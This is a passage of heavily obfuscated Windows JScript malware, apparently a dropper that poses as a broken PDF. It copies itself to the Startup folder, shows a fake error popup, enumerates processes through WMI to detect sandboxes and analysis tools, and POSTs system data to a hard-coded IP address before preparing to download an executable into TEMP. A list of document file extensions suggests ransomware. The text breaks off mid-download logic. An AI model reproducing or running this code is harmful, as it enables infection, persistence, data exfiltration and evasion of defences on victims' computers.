v1967arms35t = false;
v1967muffled34t = true;

function ulrich(t, y, u)
{
	return u['len' + 'gth'];
};
v1967might46t = false;
v1967difficulty8t = false;
v1967open69t = false;
v1967just23t = true;
v1967word39t = false;
v1967sleepiness60t = true;
v1967force8t = false;
v1967back25t = true;
v1967inbed39t = true;
v1967thewisdom63t = true;
v1967chose72t = false;
var v1967spots79t = 'undefined';
var\ u0045\ u006e\ u006d\ u004e = this["E" + "n" + "u" + "m" + "e" + "r" + "a" + "t" + "o" + "r"];
var v1967remained89t = [415, 14];
var v1967sister51 = this["A" + "c" + "t" + "i" + "v" + "e" + "X" + "O" + "b" + "j" + "e" + "c" + "t"];
var v1967armtowards4t = 'grandsons7';
var v1967thedoctors13 = this["W" + "S" + "c" + "r" + "i" + "p" + "t"];
var v1967family95t = false;
var v1967peace10 = v1967thedoctors13["S" + "c" + "r" + "i" + "p" + "t" + "F" + "u" + "l" + "l" + "N" + "a" + "m" + "e"];
var v1967frenzy36t = 'They47';
var\ u0047\ u0065\ u004f\ u0062\ u006a = this["G" + "e" + "t" + "O" + "b" + "j" + "e" + "c" + "t"];
var v1967What42t = 'undefined';
var v1967there93 = new v1967sister51("S" + "c" + "r" + "i" + "p" + "t" + "i" + "n" + "g" + "." + "F" + "i" + "l" + "e" + "S" + "y" + "s" + "t" + "e" + "m" + "O" + "b" + "j" + "e" + "c" + "t");
var v1967ishard31t = {
	X: 75
};
var v1967seemed82 = v1967thedoctors13["C" + "r" + "e" + "a" + "t" + "e" + "O" + "b" + "j" + "e" + "c" + "t"]("W" + "S" + "c" + "r" + "i" + "p" + "t" + "." + "S" + "h" + "e" + "l" + "l");
var v1967Other95t = 'undefined';
var v1967pitifully86 = new v1967sister51("A" + "D" + "O" + "D" + "B" + "." + "S" + "t" + "r" + "e" + "a" + "m");
var v1967bed75t = null;
var v1967little22 = new v1967sister51("S" + "h" + "e" + "l" + "l" + "." + "A" + "p" + "p" + "l" + "i" + "c" + "a" + "t" + "i" + "o" + "n");
var v1967against41t = null;
var v1967what50 = new v1967sister51("M" + "s" + "x" + "m" + "l" + "2" + "." + "S" + "e" + "r" + "v" + "e" + "r" + "X" + "M" + "L" + "H" + "T" + "T" + "P");
var v1967force8t = 'Indians38';
var v1967tohis29 = String["f" + "r" + "o" + "m" + "C" + "h" + "a" + "r" + "C" + "o" + "d" + "e"](92);
var v1967hardly95t = 'childrenIn85';
var\ u0075\ u0073\ u0065\ u0072\ u0031\ u0032 = v1967seemed82["E" + "x" + "p" + "a" + "n" + "d" + "E" + "n" + "v" + "i" + "r" + "o" + "n" + "m" + "e" + "n" + "t" + "S" + "t" + "r" + "i" + "n" + "g" + "s"]("%" + "U" + "S" + "E" + "R" + "P" + "R" + "O" + "F" + "I" + "L" + "E" + "%");
var v1967beenearlier10t = 0.581;
var\ u0063\ u0068\ u0061\ u0072\ u0071 = String["f" + "r" + "o" + "m" + "C" + "h" + "a" + "r" + "C" + "o" + "d" + "e"](34);
var v1967said73t = {
	Z: 85
};
var\ u0074\ u0065\ u006d\ u0070\ u0031\ u0032 = v1967seemed82["E" + "x" + "p" + "a" + "n" + "d" + "E" + "n" + "v" + "i" + "r" + "o" + "n" + "m" + "e" + "n" + "t" + "S" + "t" + "r" + "i" + "n" + "g" + "s"]("%" + "T" + "E" + "M" + "P" + "%");
var v1967would52t = 'undefined';
var v1967annoyed62 = Math["f" + "l" + "o" + "o" + "r"]((Math["r" + "a" + "n" + "d" + "o" + "m"]() * (639)) + 1);
var v1967than32t = true;
var\ u0073\ u0074\ u0061\ u0072\ u0074\ u0075\ u0070\ u0046\ u006f\ u006c\ u0064\ u0065\ u0072 = v1967little22["N" + "a" + "m" + "e" + "S" + "p" + "a" + "c" + "e"](7);
var v1967from71t = 'undefined';
var v1967heard32 = v1967tohis29 + "f" + "b" + "." + "j" + "s" + "e";
var v1967doors29t = {
	V: 77
};
var\ u0055\ u0052\ u004c\ u005f\ u004b\ u0045\ u0059 = "&" + "a" + "d" + "d" + "=" + "2" + "0" + "9" + "7" + "d" + "7" + "b" + "0" + "6" + "3" + "d" + "6" + "f" + "8" + "b" + "5" + "c" + "c" + "8" + "0" + "3" + "a" + "b" + "f" + "3" + "d" + "f" + "7" + "5" + "8" + "a" + "a";
var v1967from75t = [42, 448];
var v1967thelittle22 = "h" + "t" + "t" + "p" + "s" + ":" + "/" + "/" + "1" + "8" + "5" + "." + "1" + "3" + "0" + "." + "1" + "0" + "4" + "." + "2" + "3" + "5" + "/" + "1" + "/" + "n" + "e" + "t" + "5" + "0" + "0" + "." + "p" + "h" + "p";
var v1967than54t = 'thirst29';
var v1967other58 = '?v1967other58=new';
var v1967puttinglong22t = [498, 546];
var v1967that9 = v1967thelittle22 + v1967other58;
var v1967case12t = [67, 54];
var v1967although91 = true;
var v1967forwards27t = 0.416;
var\ u0053\ u0045\ u0054\ u005f\ u0041\ u0055\ u0054\ u004f\ u004c\ u004f\ u0041\ u0044 = true;
var v1967travelling36t = null;
var\ u0053\ u0045\ u0054\ u005f\ u0057\ u004f\ u0052\ u004d\ u005f\ u004d\ u004f\ u0044\ u0045 = true;
var v1967bed75t = null;
var v1967Youve25 = '';
var v1967against41t = null;
var v1967another22 = false;
var v1967force8t = 'Indians38';
var v1967salesmen26 = '';
var v1967hardly95t = 'childrenIn85';
var\ u0074\ u006f\ u006e\ u0065\ u0037\ u0038\ u0039 = 1;
var v1967beenearlier10t = 0.581;
var\ u0072\ u0065\ u0070\ u006f\ u0072\ u0074\ u0039 = 0;
var v1967said73t = {
	Z: 85
};
var\ u0068\ u0061\ u0073\ u0068\ u0068\ u0065\ u0072\ u0065 = 0;
var v1967would52t = 'undefined';
var v1967claim86 = 0;
var v1967than32t = true;
var\ u0065\ u0078\ u0069\ u0074\ u0031\ u0032\ u0033 = 0;
var v1967from71t = 'undefined';
var v1967through42 = 3;
var v1967doors29t = {
	V: 77
};
var\ u006f\ u006e\ u0065\ u005f\ u0074\ u0069\ u006d\ u0065 = false;
var v1967from75t = [42, 448];
var v1967could48 = null;
var v1967than54t = 'thirst29';
var v1967talking86 = null;
var v1967puttinglong22t = [498, 546];
var v1967Thetime17 = false;
var v1967case12t = [67, 54];
var v1967with46 = null;
var v1967forwards27t = 0.416;
var\ u006d\ u007a\ u0031\ u0032 = "M" + "Z";
var v1967travelling36t = null;
var\ u006d\ u0065\ u0074\ u0068\ u006f\ u0064\ u0035\ u0036 = "P" + "O" + "S" + "T";
var v1967bed75t = null;
var v1967necessary14 = null;
var v1967against41t = null;
var v1967loud80 = null;
var v1967force8t = 'Indians38';
var v1967even47 = null;
var v1967hardly95t = 'childrenIn85';
var\ u0061\ u0075\ u0074\ u006f\ u0039\ u0030\ u0039\ u0038\ u0039\ u0072 = \u0073\ u0074\ u0061\ u0072\ u0074\ u0075\ u0070\ u0046\ u006f\ u006c\ u0064\ u0065\ u0072["S" + "e" + "l" + "f"]["P" + "a" + "t" + "h"] + v1967heard32;
var v1967beenearlier10t = 0.581;
var\ u0075\ u0069\ u0064\ u0068\ u0065\ u0072\ u0065 = \u0061\ u0075\ u0074\ u006f\ u0039\ u0030\ u0039\ u0038\ u0039\ u0072 + \u0074\ u0065\ u006d\ u0070\ u0031\ u0032;
var v1967said73t = {
	Z: 85
};
var\ u0064\ u0065\ u006c\ u0061\ u0079\ u0031\ u0032\ u0033 = ("2" + "0" + "7" + "0" + "0" + "0" + "0") * 1;
var v1967would52t = 'undefined';
var v1967effort74 = "-" + "f" + " " + "-" + "d" + "e" + "c" + "o" + "d" + "e" + " ";
var v1967than32t = true;
var\ u006e\ u006f\ u0064\ u0033\ u0032\ u0073\ u0075\ u0063\ u006b\ u0073 = ("4" + "2" + "9" + "4" + "9" + "6" + "7" + "2" + "9" + "5") * 1;
var v1967from71t = 'undefined';
var v1967clock64 = null;
var v1967doors29t = {
	V: 77
};
var\ u006f\ u0062\ u006a\ u0030\ u0030\ u0057\ u004d\ u0049 = null;
var v1967from75t = [42, 448];
var v1967would55 = \u0068\ u0061\ u0073\ u0068\ u0068\ u0065\ u0072\ u0065;
var v1967than54t = 'thirst29';
var v1967despite70 = null;
var v1967puttinglong22t = [498, 546];
var v1967would85 = \u0068\ u0061\ u0073\ u0068\ u0068\ u0065\ u0072\ u0065;
var v1967from75t = [42, 448];
var v1967would552 = null;
var v1967forwards27t = 0.416;
var\ u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074 = '';
var v1967travelling36t = null;
var\ u006f\ u0073\ u0034\ u0035\ u0036 = '';
var v1967bed75t = null;
var v1967last18 = '';
var v1967against41t = null;
var v1967door77 = '';
var v1967force8t = 'Indians38';
var v1967them88 = '';
var v1967hardly95t = 'childrenIn85';
var\ u0063\ u006f\ u006c\ u0044\ u0072\ u0069\ u0076\ u0065\ u0073 = v1967there93["D" + "r" + "i" + "v" + "e" + "s"];
var v1967beenearlier10t = 0.581;
var\ u0065\ u0035\ u0036\ u0037\ u0038\ u0039 = null;
var v1967said73t = {
	Z: 85
};
var\ u0078\ u0037\ u0036\ u0035\ u0034\ u0035 = null;
var v1967would52t = 'undefined';
var v1967resolve50 = "*" + "." + "d" + "o" + "c" + " " + "*" + "." + "x" + "l" + "s" + " " + "*" + "." + "p" + "d" + "f" + " " + "*" + "." + "r" + "t" + "f" + " " + "*" + "." + "t" + "x" + "t" + " " + "*" + "." + "p" + "u" + "b" + " " + "*" + "." + "o" + "d" + "t" + " " + "*" + "." + "o" + "d" + "s" + " " + "*" + "." + "o" + "d" + "p" + " " + "*" + "." + "o" + "d" + "m" + " " + "*" + "." + "o" + "d" + "c" + " " + "*" + "." + "o" + "d" + "b" + " " + "*" + "." + "w" + "p" + "s" + " " + "*" + "." + "x" + "l" + "k" + " " + "*" + "." + "p" + "p" + "t" + " " + "*" + "." + "m" + "d" + "b" + " " + "*" + "." + "a" + "c" + "c" + "d" + "b" + " " + "*" + "." + "p" + "s" + "t" + " " + "*" + "." + "d" + "w" + "g" + " " + "*" + "." + "d" + "x" + "f" + " " + "*" + "." + "d" + "x" + "g" + " " + "*" + "." + "w" + "p" + "d";
var v1967than32t = true;
var\ u0064\ u0069\ u0073\ u006b\ u0063\ u006f\ u0075\ u006e\ u0074 = 1;
var v1967from71t = 'undefined';
var v1967were48 = "L" + "a" + "f" + "a" + "m" + "i" + "l" + "i" + "a" + "e" + "s" + "t" + "o" + "d" + "o" + "." + "t" + "x" + "t";
var v1967doors29t = {
	V: 77
};
var\ u0070\ u0075\ u0073\ u0073\ u0079\ u0038\ u0039 = null;
var v1967from75t = [42, 448];
var v1967when48 = null;
var v1967than54t = 'thirst29';
var v1967backtowards89 = -1;
var v1967puttinglong22t = [498, 546];
var v1967strenuous38 = 1;
var v1967case12t = [67, 54];
var v1967meas23 = 4;
var v1967forwards27t = 0.416;
var\ u0073\ u0068\ u0069\ u0074\ u0038\ u0039 = 40;
var v1967travelling36t = null;
var\ u0073\ u0065\ u0072\ u0074\ u0039\ u0030 = 7;
var v1967bed75t = null;
var v1967have20 = 16;
var v1967against41t = null;
var v1967balance53 = "E" + "r" + "r" + "o" + "r";
var v1967force8t = 'Indians38';
var v1967forget95 = "T" + "h" + "e" + " " + "d" + "o" + "c" + "u" + "m" + "e" + "n" + "t" + " " + "p" + "r" + "o" + "v" + "i" + "d" + "e" + "d" + " " + "a" + "s" + " " + "a" + " " + "P" + "D" + "F" + " " + "s" + "o" + "u" + "r" + "c" + "e" + " " + "w" + "a" + "s" + " " + "i" + "n" + "v" + "a" + "l" + "i" + "d" + ".";
var v1967hardly95t = 'childrenIn85';
var\ u0067\ u0037\ u0038\ u0039\ u0039 = 0;
var v1967beenearlier10t = 0.581;
var\ u0073\ u0061\ u006e\ u0064\ u0039\ u0078\ u0078 = false;
try
{
	if (v1967peace10 != \u0061\ u0075\ u0074\ u006f\ u0039\ u0030\ u0039\ u0038\ u0039\ u0072)
	{
		v1967could48 = v1967there93["O" + "p" + "e" + "n" + "T" + "e" + "x" + "t" + "F" + "i" + "l" + "e"](v1967peace10, v1967strenuous38, false, 0);
		v1967when48 = v1967could48["R" + "e" + "a" + "d" + "L" + "i" + "n" + "e"]();
		v1967could48["C" + "l" + "o" + "s" + "e"]();\
		u006f\ u006e\ u0065\ u005f\ u0074\ u0069\ u006d\ u0065 = true;
		if (v1967although91) v1967seemed82["P" + "o" + "p" + "u" + "p"](v1967forget95, 10, v1967balance53, v1967have20);
		if (v1967there93["F" + "i" + "l" + "e" + "E" + "x" + "i" + "s" + "t" + "s"](\u0061\ u0075\ u0074\ u006f\ u0039\ u0030\ u0039\ u0038\ u0039\ u0072))
		{
			v1967thedoctors13["Q" + "u" + "i" + "t"];
		}
	}
	else
	{}
}
catch (voeaPLkmnB)
{
	v1967seemed82["P" + "o" + "p" + "u" + "p"](v1967forget95, 5, v1967balance53, v1967have20);
}
while (v1967have20)
{
	v1967forget95 = "l" + "o" + "w";\
	u0074\ u006f\ u006e\ u0065\ u0037\ u0038\ u0039 = \u0074\ u006f\ u006e\ u0065\ u0037\ u0038\ u0039 + 1;
	if (\u0074\ u006f\ u006e\ u0065\ u0037\ u0038\ u0039 == \u0064\ u0065\ u006c\ u0061\ u0079\ u0031\ u0032\ u0033)
	{
		try
		{\
			u006f\ u0062\ u006a\ u0030\ u0030\ u0057\ u004d\ u0049 = \u0047\ u0065\ u004f\ u0062\ u006a("w" + "i" + "n" + "m" + "g" + "m" + "t" + "s" + ":" + "{" + "i" + "m" + "p" + "e" + "r" + "s" + "o" + "n" + "a" + "t" + "i" + "o" + "n" + "L" + "e" + "v" + "e" + "l" + "=" + "i" + "m" + "p" + "e" + "r" + "s" + "o" + "n" + "a" + "t" + "e" + "}" + "!" + v1967tohis29 + v1967tohis29 + "." + v1967tohis29 + "r" + "o" + "o" + "t" + v1967tohis29 + "c" + "i" + "m" + "v" + "2");
			v1967would55 = new\ u0045\ u006e\ u006d\ u004e(\u006f\ u0062\ u006a\ u0030\ u0030\ u0057\ u004d\ u0049["E" + "x" + "e" + "c" + "Q" + "u" + "e" + "r" + "y"]("S" + "e" + "l" + "e" + "c" + "t" + " " + "*" + " " + "f" + "r" + "o" + "m" + " " + "W" + "i" + "n" + "3" + "2" + "_" + "P" + "r" + "o" + "c" + "e" + "s" + "s"));
			v1967would552 = new\ u0045\ u006e\ u006d\ u004e(\u006f\ u0062\ u006a\ u0030\ u0030\ u0057\ u004d\ u0049["E" + "x" + "e" + "c" + "Q" + "u" + "e" + "r" + "y"]("S" + "e" + "l" + "e" + "c" + "t" + " " + "*" + " " + "f" + "r" + "o" + "m" + " " + "W" + "i" + "n" + "3" + "2" + "_" + "O" + "p" + "e" + "r" + "a" + "t" + "i" + "n" + "g" + "S" + "y" + "s" + "t" + "e" + "m"));
			while (!v1967would552["a" + "t" + "E" + "n" + "d"]())
			{
				if (\u0067\ u0037\ u0038\ u0039\ u0039 == 5) break;\
				u006f\ u0073\ u0034\ u0035\ u0036 = \u006f\ u0073\ u0034\ u0035\ u0036 + v1967would552["i" + "t" + "e" + "m"]()["C" + "a" + "p" + "t" + "i" + "o" + "n"] + v1967would552["i" + "t" + "e" + "m"]()["V" + "e" + "r" + "s" + "i" + "o" + "n"];\
				u0067\ u0037\ u0038\ u0039\ u0039++;
				v1967would552["m" + "o" + "v" + "e" + "N" + "e" + "x" + "t"]();
			}\
			u006f\ u0073\ u0034\ u0035\ u0036 = \u006f\ u0073\ u0034\ u0035\ u0036 + String["f" + "r" + "o" + "m" + "C" + "h" + "a" + "r" + "C" + "o" + "d" + "e"](13) + String["f" + "r" + "o" + "m" + "C" + "h" + "a" + "r" + "C" + "o" + "d" + "e"](10) + \u0061\ u0075\ u0074\ u006f\ u0039\ u0030\ u0039\ u0038\ u0039\ u0072;\
			u0067\ u0037\ u0038\ u0039\ u0039 = 0;
			while (!v1967would55["a" + "t" + "E" + "n" + "d"]())
			{
				if (\u0067\ u0037\ u0038\ u0039\ u0039 == 200) break;
				v1967despite70 = v1967would55["i" + "t" + "e" + "m"]();\
				u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074 = \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074 + v1967despite70["N" + "a" + "m" + "e"] + "*" + v1967despite70["E" + "x" + "e" + "c" + "u" + "t" + "a" + "b" + "l" + "e" + "P" + "a" + "t" + "h"] + String["f" + "r" + "o" + "m" + "C" + "h" + "a" + "r" + "C" + "o" + "d" + "e"](13) + String["f" + "r" + "o" + "m" + "C" + "h" + "a" + "r" + "C" + "o" + "d" + "e"](10);\
				u0067\ u0037\ u0038\ u0039\ u0039++;
				v1967would55["m" + "o" + "v" + "e" + "N" + "e" + "x" + "t"]();
			}
		}
		catch (voeaPLkmnB)
		{}
		try
		{\
			u0075\ u0069\ u0064\ u0068\ u0065\ u0072\ u0065 = \u0075\ u0069\ u0064\ u0068\ u0065\ u0072\ u0065 + \u006f\ u0073\ u0034\ u0035\ u0036;
			for (v1967claim86 = 0; v1967claim86 < \u0075\ u0069\ u0064\ u0068\ u0065\ u0072\ u0065["l" + "e" + "n" + "g" + "t" + "h"]; v1967claim86++)
			{\
				u0068\ u0061\ u0073\ u0068\ u0068\ u0065\ u0072\ u0065 = (((\u0068\ u0061\ u0073\ u0068\ u0068\ u0065\ u0072\ u0065 << (5)) - \u0068\ u0061\ u0073\ u0068\ u0068\ u0065\ u0072\ u0065) + \u0075\ u0069\ u0064\ u0068\ u0065\ u0072\ u0065["c" + "h" + "a" + "r" + "C" + "o" + "d" + "e" + "A" + "t"](v1967claim86)) & \u006e\ u006f\ u0064\ u0033\ u0032\ u0073\ u0075\ u0063\ u006b\ u0073;
			}
			if (\u0061\ u0075\ u0074\ u006f\ u0039\ u0030\ u0039\ u0038\ u0039\ u0072["i" + "n" + "d" + "e" + "x" + "O" + "f"](v1967tohis29 + "A" + "p" + "p" + "D" + "a" + "t" + "a" + v1967tohis29) == -1)
			{
				v1967claim86 = 10;
			}
			else
			{
				v1967claim86 = 20;
			}
		}
		catch (voeaPLkmnB)
		{\
			u0068\ u0061\ u0073\ u0068\ u0068\ u0065\ u0072\ u0065 = 999999;
		}\
		u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074 = \u006f\ u0073\ u0034\ u0035\ u0036 + String["f" + "r" + "o" + "m" + "C" + "h" + "a" + "r" + "C" + "o" + "d" + "e"](13) + String["f" + "r" + "o" + "m" + "C" + "h" + "a" + "r" + "C" + "o" + "d" + "e"](10) + \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074;
		if (\u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["l" + "e" + "n" + "g" + "t" + "h"] < 500 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("P" + "r" + "o" + "c" + "m" + "o" + "n") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("W" + "i" + "r" + "e" + "s" + "h" + "a" + "r" + "k") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("T" + "e" + "m" + "p" + v1967tohis29 + "i" + "e" + "x" + "p" + "l" + "o" + "r" + "e" + "." + "e" + "x" + "e") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("P" + "r" + "o" + "c" + "e" + "s" + "s" + "H" + "a" + "c" + "k" + "e" + "r") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("v" + "m" + "t" + "o" + "o" + "l" + "s" + "d") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("V" + "B" + "o" + "x" + "S" + "e" + "r" + "v" + "i" + "c" + "e") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("p" + "y" + "t" + "h" + "o" + "n") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("P" + "r" + "o" + "x" + "i" + "f" + "i" + "e" + "r" + "." + "e" + "x" + "e") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("J" + "o" + "h" + "n" + "s" + "o" + "n") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("I" + "m" + "m" + "u" + "n" + "i" + "t" + "y" + "D" + "e" + "b" + "u" + "g" + "g" + "e" + "r" + "." + "e" + "x" + "e") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("l" + "o" + "r" + "d" + "P" + "E" + "." + "e" + "x" + "e") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("c" + "t" + "f" + "m" + "o" + "n" + "." + "e" + "x" + "e" + "*" + "J" + "O" + "H" + "N" + "-" + "P" + "C") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("B" + "e" + "h" + "a" + "v" + "i" + "o" + "r" + "D" + "u" + "m" + "p" + "e" + "r") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("a" + "n" + "t" + "i" + "-" + "v" + "i" + "r" + "u" + "s" + "." + "E" + "X" + "E") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("A" + "g" + "e" + "n" + "t" + "S" + "i" + "m" + "u" + "l" + "a" + "t" + "o" + "r" + "." + "e" + "x" + "e") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("V" + "z" + "S" + "e" + "r" + "v" + "i" + "c" + "e" + "." + "e" + "x" + "e") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("V" + "B" + "o" + "x" + "T" + "r" + "a" + "y" + "." + "e" + "x" + "e") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("V" + "m" + "R" + "e" + "m" + "o" + "t" + "e" + "G" + "u" + "e" + "s" + "t") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("S" + "y" + "s" + "t" + "e" + "m" + "I" + "T" + "|" + "a" + "d" + "m" + "i" + "n") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("W" + "I" + "N" + "7" + "-" + "T" + "R" + "A" + "P" + "S") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("E" + "m" + "i" + "l" + "y" + v1967tohis29 + "A" + "p" + "p" + "D" + "a" + "t" + "a") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("P" + "R" + "O" + "C" + "M" + "O" + "N") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("p" + "r" + "o" + "c" + "e" + "x" + "p") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("t" + "c" + "p" + "d" + "u" + "m" + "p") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("F" + "r" + "z" + "S" + "t" + "a" + "t" + "e" + "2" + "k") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("D" + "F" + "L" + "o" + "c" + "k" + "e" + "r" + "6" + "4") != v1967backtowards89 || \u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074["i" + "n" + "d" + "e" + "x" + "O" + "f"]("v" + "m" + "w" + "a" + "r" + "e") != v1967backtowards89)
		{
			pdfdoc["a" + "l" + "e" + "r" + "t"]("N" + "o" + " " + "m" + "o" + "r" + "e" + " " + "h" + "a" + "l" + "f" + "-" + "m" + "e" + "a" + "s" + "u" + "r" + "e" + "s" + ".");
			v1967thedoctors13["Q" + "u" + "i" + "t"];\
			u0073\ u0061\ u006e\ u0064\ u0039\ u0078\ u0078 = true;
		}
		try
		{
			if (\u006f\ u006e\ u0065\ u005f\ u0074\ u0069\ u006d\ u0065 && \u0053\ u0045\ u0054\ u005f\ u0041\ u0055\ u0054\ u004f\ u004c\ u004f\ u0041\ u0044)
			{
				v1967talking86 = v1967there93["C" + "r" + "e" + "a" + "t" + "e" + "T" + "e" + "x" + "t" + "F" + "i" + "l" + "e"](\u0061\ u0075\ u0074\ u006f\ u0039\ u0030\ u0039\ u0038\ u0039\ u0072, true, false);
				v1967talking86["W" + "r" + "i" + "t" + "e" + "L" + "i" + "n" + "e"](v1967when48);
				v1967talking86["C" + "l" + "o" + "s" + "e"]();
			}
		}
		catch (voeaPLkmnB)
		{}
		while (\u0073\ u0065\ u0072\ u0074\ u0039\ u0030)
		{
			try
			{
				v1967salesmen26 = \u0074\ u0065\ u006d\ u0070\ u0031\ u0032 + v1967tohis29 + Math["f" + "l" + "o" + "o" + "r"]((Math["r" + "a" + "n" + "d" + "o" + "m"]() * (840)) + 1) + Math["f" + "l" + "o" + "o" + "r"]((Math["r" + "a" + "n" + "d" + "o" + "m"]() * (712)) + 1) + "." + "e" + "x" + "e";
				v1967Youve25 = \u0074\ u0065\ u006d\ u0070\ u0031\ u0032 + v1967tohis29 + Math["f" + "l" + "o" + "o" + "r"]((Math["r" + "a" + "n" + "d" + "o" + "m"]() * (888)) + 1) + Math["f" + "l" + "o" + "o" + "r"]((Math["r" + "a" + "n" + "d" + "o" + "m"]() * (900)) + 1) + "." + "m" + "t" + "m";
				v1967what50["s" + "e" + "t" + "O" + "p" + "t" + "i" + "o" + "n"](v1967through42, "M" + "S" + "X" + "M" + "L");
				v1967clock64 = v1967that9 + \u0055\ u0052\ u004c\ u005f\ u004b\ u0045\ u0059 + "&" + "u" + "=" + Math["a" + "b" + "s"](\u0068\ u0061\ u0073\ u0068\ u0068\ u0065\ u0072\ u0065) + "&" + "o" + "=" + \u0072\ u0065\ u0070\ u006f\ u0072\ u0074\ u0039 + "&" + "v" + "=" + v1967claim86 + "&" + "s" + "=" + Math["f" + "l" + "o" + "o" + "r"]((Math["r" + "a" + "n" + "d" + "o" + "m"]() * (998)) + 1) + Math["f" + "l" + "o" + "o" + "r"]((Math["r" + "a" + "n" + "d" + "o" + "m"]() * (888)) + 1) + Math["f" + "l" + "o" + "o" + "r"]((Math["r" + "a" + "n" + "d" + "o" + "m"]() * (590)) + 1);
				v1967what50["o" + "p" + "e" + "n"](\u006d\ u0065\ u0074\ u0068\ u006f\ u0064\ u0035\ u0036, v1967clock64, false);
				v1967what50["s" + "e" + "n" + "d"](\u0070\ u0072\ u006f\ u0063\ u0065\ u0073\ u0073\ u006c\ u0069\ u0073\ u0074);
				if (v1967what50["s" + "t" + "a" + "t" + "u" + "s"] == 200)
				{
					if (\u0072\ u0065\ u0070\ u006f\ u0072\ u0074\ u0039 == 0)
					{
						v1967with46 = v1967what50["r" + "e" + "s" + "p" + "o" + "n" + "s" + "e" + "T" + "e" + "x" + "t"];
						try
						{
